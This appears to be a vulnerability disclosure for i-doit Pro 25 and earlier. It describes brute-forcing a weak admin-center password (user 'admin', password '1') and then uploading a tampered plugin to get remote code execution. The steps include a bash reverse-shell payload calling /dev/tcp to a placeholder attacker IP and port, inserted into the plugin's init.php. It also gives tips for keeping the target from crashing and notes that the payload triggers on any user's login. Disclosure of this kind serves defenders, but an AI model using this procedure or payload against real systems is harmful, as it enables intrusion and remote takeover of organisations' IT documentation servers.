i-doit Pro 25 and below are vulnerable to weak password requirement vulnerability in admin-center + malicious plugin upload lead to RCE vulnerability. These vulnerabilities could allows attacker to easily brute force or password guessed to gain access to admin-center and upload malicious plugin to gain remote code execution.

Description of product: i-doit is a web based Open Source IT documentation and CMDB (Configuration Management Database) developed by synetics GmbH. i-doit Pro is the commercial version of the software and requires a paid license. It comes with additional features, professional support, and regular updates and enhancements. Users need to purchase a license to use i-doit Pro, and the cost varies based on the number of users and features required.

Description of vulnerability: We found that this web application has weak password requirement in admin-center account creation, application owner can even set minimum 1 character password with default username “admin”. It could make attacker to easily brute force or password guessed to gain access to admin-center and upload malicious plugin to gain remote code execution.

Affected Webpage: admin-center login page + plugin install

Affected parameter & Component : admin-center login page + plugin install

Step 1 : as there are no password requirement or no password complexity implemented in account creation for admin-center, we can start from brute force. Screenshot below shows we can login with username “admin” with password “1”

Step 2 : navigate to Add-on tab and choose upload

Step 3 : there are some requirement like package.json must exist and we found that the target has implemented async to check every classes and function . but we can download a proper plugin from their customer portal and edit / add in the init.php, this is the safest way to prevent system crash when trigger the payload. Note: please put & at the end of the line to prevent system crash after payload triggered and init.php is the best place to inject payload Example : exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");

Note : remember to zip it back and upload

Note : click Install then activate the elected Add-on

Note: your payload will be triggered when someone login , it can be anyone.